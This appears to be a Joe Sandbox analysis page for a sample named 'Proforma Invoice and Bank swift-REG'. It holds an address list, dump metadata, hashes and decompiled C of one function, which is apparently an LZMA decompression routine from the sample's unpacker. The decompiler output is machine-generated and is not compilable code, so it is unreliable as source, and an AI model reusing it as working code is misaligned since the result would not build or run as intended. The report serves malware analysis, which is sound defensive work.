0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x00000000
0x00000000
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x00000000
0x00000000
0x00000000
0x00000000
0x004064ee
0x004064f2
0x004064f9
0x004064fc
0x004064ff
0x00406509
0x00000000
0x00406509
0x004064f4
0x00000000
0x00000000
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x0040652f
0x0040652f
0x00406532
0x00406535
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00000000
0x00406977
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x004061ca
0x004061ca
0x004061ce
0x0040693b
0x00000000
0x0040693b
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061e9
0x004061ec
0x004061ef
0x004061ef
0x004061f2
0x004061f5
0x00000000
0x00000000
0x004061fb
0x00406201
0x00000000
0x00000000
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406232
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406265
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x0040626e
0x00406275
0x00406278
0x00000000
0x0040627e
0x00000000
0x0040627e
0x00000000
0x00406283
0x00406283
0x00406287
0x00406947
0x00000000
0x00406947
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a2
0x004062a5
0x004062a8
0x004062a8
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f6
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x004062fb
0x00406302
0x00406305
0x00000000
0x00406307
0x00000000
0x00406307
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x0040630c
0x00000000
0x00000000
0x00406347
0x00406347
0x0040634b
0x00406953
0x00000000
0x00406953
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406366
0x00406369
0x0040636c
0x0040636c
0x00406372
0x00406310
0x00406310
0x00406313
0x00000000
0x00406313
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x0040638f
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063ba
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063bf
0x004063c6
0x004063c9
0x00000000
0x004063cb
0x00000000
0x004063cb
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00000000
0x00406983
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406767
0x0040676b
0x0040678d
0x00406790
0x0040679a
0x00000000
0x0040679a
0x0040676d
0x00406770
0x00406774
0x00406777
0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00000000
0x0040685b
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406918
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00406899
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00000000
0x0040690d
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068bd
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068ef
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x00000000
0x00406762
0x00406760
0x00406995
0x00000000
0x00000000
0x00405fc4

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
Instruction ID: e06b97397237a54a8f7c6fae7a0c48c933f493286525731b7b3672fa0d973436
Opcode Fuzzy Hash: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
Instruction Fuzzy Hash: 678155B1D00229CFDF24CFA8C8447ADBBB1FB44305F25816AD456BB281D7789A96CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405F82, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405F82(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004069D4))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
